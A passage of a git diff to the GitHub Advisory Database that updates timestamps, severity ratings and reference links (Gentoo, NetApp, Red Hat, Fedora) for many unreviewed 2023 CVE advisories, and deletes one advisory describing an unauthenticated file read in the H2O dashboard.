b/advisories/unreviewed/2023/10/GHSA-w5h3-rmvr-mgm6/GHSA-w5h3-rmvr-mgm6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w5h3-rmvr-mgm6", - "modified": "2023-10-25T18:32:21Z", + "modified": "2024-02-01T15:30:24Z", "published": "2023-10-25T18:32:21Z", "aliases": [ "CVE-2023-37283" @@ -34,7 +34,7 @@ "cwe_ids": [ "CWE-287" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-25T18:17:28Z" diff --git a/advisories/unreviewed/2023/10/GHSA-wqrm-w4fm-fmh8/GHSA-wqrm-w4fm-fmh8.json b/advisories/unreviewed/2023/10/GHSA-wqrm-w4fm-fmh8/GHSA-wqrm-w4fm-fmh8.json index cfad40209d56e..081521f5c05bd 100644 --- a/advisories/unreviewed/2023/10/GHSA-wqrm-w4fm-fmh8/GHSA-wqrm-w4fm-fmh8.json +++ b/advisories/unreviewed/2023/10/GHSA-wqrm-w4fm-fmh8/GHSA-wqrm-w4fm-fmh8.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TDMQG42VVOZ5USSI4NSNT3VJPGBPNSIW/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5536" diff --git a/advisories/unreviewed/2023/10/GHSA-xm85-mgcm-6w3f/GHSA-xm85-mgcm-6w3f.json b/advisories/unreviewed/2023/10/GHSA-xm85-mgcm-6w3f/GHSA-xm85-mgcm-6w3f.json index 61875cef45b12..bc3100d309f92 100644 --- a/advisories/unreviewed/2023/10/GHSA-xm85-mgcm-6w3f/GHSA-xm85-mgcm-6w3f.json +++ b/advisories/unreviewed/2023/10/GHSA-xm85-mgcm-6w3f/GHSA-xm85-mgcm-6w3f.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xm85-mgcm-6w3f", - "modified": "2023-10-13T21:30:21Z", + "modified": "2024-02-03T09:30:17Z", "published": "2023-10-13T21:30:21Z", "aliases": [ "CVE-2023-36559" @@ -24,13 +24,17 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36559" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { "cwe_ids": [ ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2023-10-13T21:15:51Z" diff --git a/advisories/unreviewed/2023/10/GHSA-xw78-pcr6-wrg8/GHSA-xw78-pcr6-wrg8.json b/advisories/unreviewed/2023/10/GHSA-xw78-pcr6-wrg8/GHSA-xw78-pcr6-wrg8.json index 7b699c6d2756d..b046074f10d28 100644 --- a/advisories/unreviewed/2023/10/GHSA-xw78-pcr6-wrg8/GHSA-xw78-pcr6-wrg8.json +++ b/advisories/unreviewed/2023/10/GHSA-xw78-pcr6-wrg8/GHSA-xw78-pcr6-wrg8.json @@ -33,6 +33,14 @@ "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231027-0010/" }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0003/" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20240201-0004/" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5532" diff --git a/advisories/unreviewed/2023/11/GHSA-33qg-rqxq-9ghc/GHSA-33qg-rqxq-9ghc.json b/advisories/unreviewed/2023/11/GHSA-33qg-rqxq-9ghc/GHSA-33qg-rqxq-9ghc.json index aa7013301cbcb..6630bcecfa31a 100644 --- a/advisories/unreviewed/2023/11/GHSA-33qg-rqxq-9ghc/GHSA-33qg-rqxq-9ghc.json +++ b/advisories/unreviewed/2023/11/GHSA-33qg-rqxq-9ghc/GHSA-33qg-rqxq-9ghc.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-33qg-rqxq-9ghc", - "modified": "2023-11-22T21:31:07Z", + "modified": "2024-02-06T15:32:03Z", "published": "2023-11-22T21:31:07Z", "aliases": [ "CVE-2023-47781" diff --git a/advisories/unreviewed/2023/11/GHSA-35r7-vh9q-xpf7/GHSA-35r7-vh9q-xpf7.json b/advisories/unreviewed/2023/11/GHSA-35r7-vh9q-xpf7/GHSA-35r7-vh9q-xpf7.json index fe199331dacd0..09a09243a5345 100644 --- a/advisories/unreviewed/2023/11/GHSA-35r7-vh9q-xpf7/GHSA-35r7-vh9q-xpf7.json +++ b/advisories/unreviewed/2023/11/GHSA-35r7-vh9q-xpf7/GHSA-35r7-vh9q-xpf7.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5556" diff --git a/advisories/unreviewed/2023/11/GHSA-39vm-62wp-46hv/GHSA-39vm-62wp-46hv.json b/advisories/unreviewed/2023/11/GHSA-39vm-62wp-46hv/GHSA-39vm-62wp-46hv.json index e5565f17632a6..45f19c45ea0f1 100644 --- a/advisories/unreviewed/2023/11/GHSA-39vm-62wp-46hv/GHSA-39vm-62wp-46hv.json +++ b/advisories/unreviewed/2023/11/GHSA-39vm-62wp-46hv/GHSA-39vm-62wp-46hv.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-4742-9c9c-4wf7/GHSA-4742-9c9c-4wf7.json b/advisories/unreviewed/2023/11/GHSA-4742-9c9c-4wf7/GHSA-4742-9c9c-4wf7.json index 5508d5a738dd3..239b4d6a424df 100644 --- a/advisories/unreviewed/2023/11/GHSA-4742-9c9c-4wf7/GHSA-4742-9c9c-4wf7.json +++ b/advisories/unreviewed/2023/11/GHSA-4742-9c9c-4wf7/GHSA-4742-9c9c-4wf7.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36029" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/11/GHSA-47vw-3hx2-6877/GHSA-47vw-3hx2-6877.json b/advisories/unreviewed/2023/11/GHSA-47vw-3hx2-6877/GHSA-47vw-3hx2-6877.json index 20d39978aca5c..70485916aebe9 100644 --- a/advisories/unreviewed/2023/11/GHSA-47vw-3hx2-6877/GHSA-47vw-3hx2-6877.json +++ b/advisories/unreviewed/2023/11/GHSA-47vw-3hx2-6877/GHSA-47vw-3hx2-6877.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJROPNKWW65R34J4IYGTJ7A3OBPUL4IQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5569" diff --git a/advisories/unreviewed/2023/11/GHSA-4vx9-ghq5-84jw/GHSA-4vx9-ghq5-84jw.json b/advisories/unreviewed/2023/11/GHSA-4vx9-ghq5-84jw/GHSA-4vx9-ghq5-84jw.json index 79dd34bae4feb..a2fd7998a84d2 100644 --- a/advisories/unreviewed/2023/11/GHSA-4vx9-ghq5-84jw/GHSA-4vx9-ghq5-84jw.json +++ b/advisories/unreviewed/2023/11/GHSA-4vx9-ghq5-84jw/GHSA-4vx9-ghq5-84jw.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJROPNKWW65R34J4IYGTJ7A3OBPUL4IQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5569" diff --git a/advisories/unreviewed/2023/11/GHSA-6jj9-4hh8-6xpv/GHSA-6jj9-4hh8-6xpv.json b/advisories/unreviewed/2023/11/GHSA-6jj9-4hh8-6xpv/GHSA-6jj9-4hh8-6xpv.json index 037c1abbec6a5..c723c392c6460 100644 --- a/advisories/unreviewed/2023/11/GHSA-6jj9-4hh8-6xpv/GHSA-6jj9-4hh8-6xpv.json +++ b/advisories/unreviewed/2023/11/GHSA-6jj9-4hh8-6xpv/GHSA-6jj9-4hh8-6xpv.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJROPNKWW65R34J4IYGTJ7A3OBPUL4IQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5569" diff --git a/advisories/unreviewed/2023/11/GHSA-6mv8-95x5-xcq9/GHSA-6mv8-95x5-xcq9.json b/advisories/unreviewed/2023/11/GHSA-6mv8-95x5-xcq9/GHSA-6mv8-95x5-xcq9.json deleted file mode 100644 index 2a306655a9cc9..0000000000000 --- a/advisories/unreviewed/2023/11/GHSA-6mv8-95x5-xcq9/GHSA-6mv8-95x5-xcq9.json +++ /dev/null @@ -1,39 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-6mv8-95x5-xcq9", - "modified": "2023-11-16T18:30:31Z", - "published": "2023-11-16T18:30:31Z", - "aliases": [ - "CVE-2023-6038" - ], - "details": "An attacker is able to read any file on the server hosting the H2O dashboard without any authentication.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6038" - }, - { - "type": "WEB", - "url": "https://huntr.com/bounties/380fce33-fec5-49d9-a101-12c972125d8c" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-29", - "CWE-862" - ], - "severity": "CRITICAL", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2023-11-16T17:15:09Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2023/11/GHSA-6wwh-cvh6-jmg9/GHSA-6wwh-cvh6-jmg9.json b/advisories/unreviewed/2023/11/GHSA-6wwh-cvh6-jmg9/GHSA-6wwh-cvh6-jmg9.json index fbfd61fe0e980..e9f2e33511944 100644 --- a/advisories/unreviewed/2023/11/GHSA-6wwh-cvh6-jmg9/GHSA-6wwh-cvh6-jmg9.json +++ b/advisories/unreviewed/2023/11/GHSA-6wwh-cvh6-jmg9/GHSA-6wwh-cvh6-jmg9.json @@ -21,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44324" }, + { + "type": "WEB", + "url": "https://helpx.adobe.com/security/products/framemaker-publishing-server/apsb23-58.html" + }, { "type": "WEB", "url": "https://helpx.adobe.com/security/products/framemaker/apsb23-58.html" diff --git a/advisories/unreviewed/2023/11/GHSA-75mv-f5hh-c65h/GHSA-75mv-f5hh-c65h.json b/advisories/unreviewed/2023/11/GHSA-75mv-f5hh-c65h/GHSA-75mv-f5hh-c65h.json index 99d1f52d5b39f..1493b027ff31d 100644 --- a/advisories/unreviewed/2023/11/GHSA-75mv-f5hh-c65h/GHSA-75mv-f5hh-c65h.json +++ b/advisories/unreviewed/2023/11/GHSA-75mv-f5hh-c65h/GHSA-75mv-f5hh-c65h.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-7cjp-92p9-vr97/GHSA-7cjp-92p9-vr97.json b/advisories/unreviewed/2023/11/GHSA-7cjp-92p9-vr97/GHSA-7cjp-92p9-vr97.json index 5bdf14248fd98..fe288637e1aa7 100644 --- a/advisories/unreviewed/2023/11/GHSA-7cjp-92p9-vr97/GHSA-7cjp-92p9-vr97.json +++ b/advisories/unreviewed/2023/11/GHSA-7cjp-92p9-vr97/GHSA-7cjp-92p9-vr97.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-7x7g-p6hc-7cp3/GHSA-7x7g-p6hc-7cp3.json b/advisories/unreviewed/2023/11/GHSA-7x7g-p6hc-7cp3/GHSA-7x7g-p6hc-7cp3.json index 072a594bf68ac..e7c04b28c7a4a 100644 --- a/advisories/unreviewed/2023/11/GHSA-7x7g-p6hc-7cp3/GHSA-7x7g-p6hc-7cp3.json +++ b/advisories/unreviewed/2023/11/GHSA-7x7g-p6hc-7cp3/GHSA-7x7g-p6hc-7cp3.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36034" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/11/GHSA-98mf-83qw-2xg8/GHSA-98mf-83qw-2xg8.json b/advisories/unreviewed/2023/11/GHSA-98mf-83qw-2xg8/GHSA-98mf-83qw-2xg8.json index bfd20ca3fcb2c..628c13486238e 100644 --- a/advisories/unreviewed/2023/11/GHSA-98mf-83qw-2xg8/GHSA-98mf-83qw-2xg8.json +++ b/advisories/unreviewed/2023/11/GHSA-98mf-83qw-2xg8/GHSA-98mf-83qw-2xg8.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36409" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/11/GHSA-9jpv-w64v-mgr2/GHSA-9jpv-w64v-mgr2.json b/advisories/unreviewed/2023/11/GHSA-9jpv-w64v-mgr2/GHSA-9jpv-w64v-mgr2.json index c4c378e5b0d87..3e8a2489669c6 100644 --- a/advisories/unreviewed/2023/11/GHSA-9jpv-w64v-mgr2/GHSA-9jpv-w64v-mgr2.json +++ b/advisories/unreviewed/2023/11/GHSA-9jpv-w64v-mgr2/GHSA-9jpv-w64v-mgr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9jpv-w64v-mgr2", - "modified": "2023-11-28T12:31:25Z", + "modified": "2024-02-01T03:30:22Z", "published": "2023-11-02T09:30:18Z", "aliases": [ "CVE-2023-46595" diff --git a/advisories/unreviewed/2023/11/GHSA-c254-v996-g238/GHSA-c254-v996-g238.json b/advisories/unreviewed/2023/11/GHSA-c254-v996-g238/GHSA-c254-v996-g238.json index b86b7fd087110..5ffdb9ba359ee 100644 --- a/advisories/unreviewed/2023/11/GHSA-c254-v996-g238/GHSA-c254-v996-g238.json +++ b/advisories/unreviewed/2023/11/GHSA-c254-v996-g238/GHSA-c254-v996-g238.json @@ -24,6 +24,10 @@ { "type": "WEB", "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36022" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-05" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/11/GHSA-c46p-5pq2-qpcg/GHSA-c46p-5pq2-qpcg.json b/advisories/unreviewed/2023/11/GHSA-c46p-5pq2-qpcg/GHSA-c46p-5pq2-qpcg.json index ead2451864f08..9f2a54ac4529b 100644 --- a/advisories/unreviewed/2023/11/GHSA-c46p-5pq2-qpcg/GHSA-c46p-5pq2-qpcg.json +++ b/advisories/unreviewed/2023/11/GHSA-c46p-5pq2-qpcg/GHSA-c46p-5pq2-qpcg.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-c8pp-vxj4-7mp3/GHSA-c8pp-vxj4-7mp3.json b/advisories/unreviewed/2023/11/GHSA-c8pp-vxj4-7mp3/GHSA-c8pp-vxj4-7mp3.json index ac3399f2465d1..fbb5cd1ce0be3 100644 --- a/advisories/unreviewed/2023/11/GHSA-c8pp-vxj4-7mp3/GHSA-c8pp-vxj4-7mp3.json +++ b/advisories/unreviewed/2023/11/GHSA-c8pp-vxj4-7mp3/GHSA-c8pp-vxj4-7mp3.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-fggx-frxq-cpx8/GHSA-fggx-frxq-cpx8.json b/advisories/unreviewed/2023/11/GHSA-fggx-frxq-cpx8/GHSA-fggx-frxq-cpx8.json index 8cdaada909153..a96c507b10086 100644 --- a/advisories/unreviewed/2023/11/GHSA-fggx-frxq-cpx8/GHSA-fggx-frxq-cpx8.json +++ b/advisories/unreviewed/2023/11/GHSA-fggx-frxq-cpx8/GHSA-fggx-frxq-cpx8.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5556" diff --git a/advisories/unreviewed/2023/11/GHSA-fq9v-vwjc-pv76/GHSA-fq9v-vwjc-pv76.json b/advisories/unreviewed/2023/11/GHSA-fq9v-vwjc-pv76/GHSA-fq9v-vwjc-pv76.json index 84d5d93f30a50..da478203c0988 100644 --- a/advisories/unreviewed/2023/11/GHSA-fq9v-vwjc-pv76/GHSA-fq9v-vwjc-pv76.json +++ b/advisories/unreviewed/2023/11/GHSA-fq9v-vwjc-pv76/GHSA-fq9v-vwjc-pv76.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-fq9v-vwjc-pv76", - "modified": "2023-11-16T18:30:31Z", + "modified": "2024-02-08T18:30:38Z", "published": "2023-11-16T18:30:31Z", "aliases": [ "CVE-2023-6176" @@ -32,6 +32,10 @@ { "type": "WEB", "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=cfaa80c91f6f99b9342b6557f0f0e1143e434066" + }, + { + "type": "WEB", + "url": "http://packetstormsecurity.com/files/177029/Kernel-Live-Patch-Security-Notice-LSN-0100-1.html" } ], "database_specific": { diff --git a/advisories/unreviewed/2023/11/GHSA-g35p-9423-7ww9/GHSA-g35p-9423-7ww9.json b/advisories/unreviewed/2023/11/GHSA-g35p-9423-7ww9/GHSA-g35p-9423-7ww9.json index d582e950b2062..9399d75dedb5c 100644 --- a/advisories/unreviewed/2023/11/GHSA-g35p-9423-7ww9/GHSA-g35p-9423-7ww9.json +++ b/advisories/unreviewed/2023/11/GHSA-g35p-9423-7ww9/GHSA-g35p-9423-7ww9.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-g9xm-mgr3-c2x8/GHSA-g9xm-mgr3-c2x8.json b/advisories/unreviewed/2023/11/GHSA-g9xm-mgr3-c2x8/GHSA-g9xm-mgr3-c2x8.json index 23b1de71a11e7..e8ca2848563ff 100644 --- a/advisories/unreviewed/2023/11/GHSA-g9xm-mgr3-c2x8/GHSA-g9xm-mgr3-c2x8.json +++ b/advisories/unreviewed/2023/11/GHSA-g9xm-mgr3-c2x8/GHSA-g9xm-mgr3-c2x8.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-g9xm-mgr3-c2x8", - "modified": "2023-11-21T18:30:26Z", + "modified": "2024-02-06T15:32:03Z", "published": "2023-11-14T00:30:19Z", "aliases": [ "CVE-2023-47673" diff --git a/advisories/unreviewed/2023/11/GHSA-gww9-w46q-2x34/GHSA-gww9-w46q-2x34.json b/advisories/unreviewed/2023/11/GHSA-gww9-w46q-2x34/GHSA-gww9-w46q-2x34.json index 08749b9899f3a..94888af1771f8 100644 --- a/advisories/unreviewed/2023/11/GHSA-gww9-w46q-2x34/GHSA-gww9-w46q-2x34.json +++ b/advisories/unreviewed/2023/11/GHSA-gww9-w46q-2x34/GHSA-gww9-w46q-2x34.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-jvj3-gqjm-cg8p/GHSA-jvj3-gqjm-cg8p.json b/advisories/unreviewed/2023/11/GHSA-jvj3-gqjm-cg8p/GHSA-jvj3-gqjm-cg8p.json index 45530246a03e7..0892cc4903ac9 100644 --- a/advisories/unreviewed/2023/11/GHSA-jvj3-gqjm-cg8p/GHSA-jvj3-gqjm-cg8p.json +++ b/advisories/unreviewed/2023/11/GHSA-jvj3-gqjm-cg8p/GHSA-jvj3-gqjm-cg8p.json @@ -37,6 +37,10 @@ "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2024:0451" }, + { + "type": "WEB", + "url": "https://access.redhat.com/errata/RHSA-2024:0533" + }, { "type": "WEB", "url": "https://access.redhat.com/security/cve/CVE-2023-5981" @@ -49,6 +53,10 @@ "type": "WEB", "url": "https://gnutls.org/security-new.html#GNUTLS-SA-2023-10-23" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GNXKVR5YNUEBNHAHM5GSYKBZX4W2HMN2/" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/19/3" diff --git a/advisories/unreviewed/2023/11/GHSA-jwj7-8489-4jqm/GHSA-jwj7-8489-4jqm.json b/advisories/unreviewed/2023/11/GHSA-jwj7-8489-4jqm/GHSA-jwj7-8489-4jqm.json index a702f70db3f83..6a97e1204ebec 100644 --- a/advisories/unreviewed/2023/11/GHSA-jwj7-8489-4jqm/GHSA-jwj7-8489-4jqm.json +++ b/advisories/unreviewed/2023/11/GHSA-jwj7-8489-4jqm/GHSA-jwj7-8489-4jqm.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-p4vh-m995-92m8/GHSA-p4vh-m995-92m8.json b/advisories/unreviewed/2023/11/GHSA-p4vh-m995-92m8/GHSA-p4vh-m995-92m8.json index 7bda633f43130..f4e4fabfd069d 100644 --- a/advisories/unreviewed/2023/11/GHSA-p4vh-m995-92m8/GHSA-p4vh-m995-92m8.json +++ b/advisories/unreviewed/2023/11/GHSA-p4vh-m995-92m8/GHSA-p4vh-m995-92m8.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-pq78-6h8h-rcf4/GHSA-pq78-6h8h-rcf4.json b/advisories/unreviewed/2023/11/GHSA-pq78-6h8h-rcf4/GHSA-pq78-6h8h-rcf4.json index 312c2289182c8..8e189e113f3f8 100644 --- a/advisories/unreviewed/2023/11/GHSA-pq78-6h8h-rcf4/GHSA-pq78-6h8h-rcf4.json +++ b/advisories/unreviewed/2023/11/GHSA-pq78-6h8h-rcf4/GHSA-pq78-6h8h-rcf4.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-q3gq-rg4m-vgrp/GHSA-q3gq-rg4m-vgrp.json b/advisories/unreviewed/2023/11/GHSA-q3gq-rg4m-vgrp/GHSA-q3gq-rg4m-vgrp.json index e862b401016ba..0b1aed506dfab 100644 --- a/advisories/unreviewed/2023/11/GHSA-q3gq-rg4m-vgrp/GHSA-q3gq-rg4m-vgrp.json +++ b/advisories/unreviewed/2023/11/GHSA-q3gq-rg4m-vgrp/GHSA-q3gq-rg4m-vgrp.json @@ -45,6 +45,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5551" diff --git a/advisories/unreviewed/2023/11/GHSA-qf75-86xr-cfpw/GHSA-qf75-86xr-cfpw.json b/advisories/unreviewed/2023/11/GHSA-qf75-86xr-cfpw/GHSA-qf75-86xr-cfpw.json index efc4204a2b5dd..2520ac0433a62 100644 --- a/advisories/unreviewed/2023/11/GHSA-qf75-86xr-cfpw/GHSA-qf75-86xr-cfpw.json +++ b/advisories/unreviewed/2023/11/GHSA-qf75-86xr-cfpw/GHSA-qf75-86xr-cfpw.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-qfx8-xprj-wvh4/GHSA-qfx8-xprj-wvh4.json b/advisories/unreviewed/2023/11/GHSA-qfx8-xprj-wvh4/GHSA-qfx8-xprj-wvh4.json index 78145922f09dc..fa20f04f1b831 100644 --- a/advisories/unreviewed/2023/11/GHSA-qfx8-xprj-wvh4/GHSA-qfx8-xprj-wvh4.json +++ b/advisories/unreviewed/2023/11/GHSA-qfx8-xprj-wvh4/GHSA-qfx8-xprj-wvh4.json @@ -49,6 +49,10 @@ "type": "WEB", "url": "https://security.gentoo.org/glsa/202312-07" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5546" diff --git a/advisories/unreviewed/2023/11/GHSA-w427-5x7p-xj8x/GHSA-w427-5x7p-xj8x.json b/advisories/unreviewed/2023/11/GHSA-w427-5x7p-xj8x/GHSA-w427-5x7p-xj8x.json index 5ccc6ade19940..19cd64c8ff680 100644 --- a/advisories/unreviewed/2023/11/GHSA-w427-5x7p-xj8x/GHSA-w427-5x7p-xj8x.json +++ b/advisories/unreviewed/2023/11/GHSA-w427-5x7p-xj8x/GHSA-w427-5x7p-xj8x.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJROPNKWW65R34J4IYGTJ7A3OBPUL4IQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5569" diff --git a/advisories/unreviewed/2023/11/GHSA-wmh6-7xp9-5gh8/GHSA-wmh6-7xp9-5gh8.json b/advisories/unreviewed/2023/11/GHSA-wmh6-7xp9-5gh8/GHSA-wmh6-7xp9-5gh8.json index 87920cdab7e73..ea0c00574ae18 100644 --- a/advisories/unreviewed/2023/11/GHSA-wmh6-7xp9-5gh8/GHSA-wmh6-7xp9-5gh8.json +++ b/advisories/unreviewed/2023/11/GHSA-wmh6-7xp9-5gh8/GHSA-wmh6-7xp9-5gh8.json @@ -41,6 +41,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UJROPNKWW65R34J4IYGTJ7A3OBPUL4IQ/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-34" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5569" diff --git a/advisories/unreviewed/2023/11/GHSA-xgr2-4f4q-m3p9/GHSA-xgr2-4f4q-m3p9.json b/advisories/unreviewed/2023/11/GHSA-xgr2-4f4q-m3p9/GHSA-xgr2-4f4q-m3p9.json index c4072c1f062dd..9e8a62f0801f3 100644 --- a/advisories/unreviewed/2023/11/GHSA-xgr2-4f4q-m3p9/GHSA-xgr2-4f4q-m3p9.json +++ b/advisories/unreviewed/2023/11/GHSA-xgr2-4f4q-m3p9/GHSA-xgr2-4f4q-m3p9.json @@ -29,6 +29,14 @@ "type": "WEB", "url": "https://kernel.dance/93995bf4af2c5a99e2a87f0cd5ce547d31eb7630" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3OXWBKK7RTQOGGDLQGCZFS753VLGS2GD/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3S55P23EYAWDHXZPJEVTGIRZZRICYI3Z/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/IG6IF3FUY7LVZJMFRPANAU4L4PSJ3ESQ/" diff --git 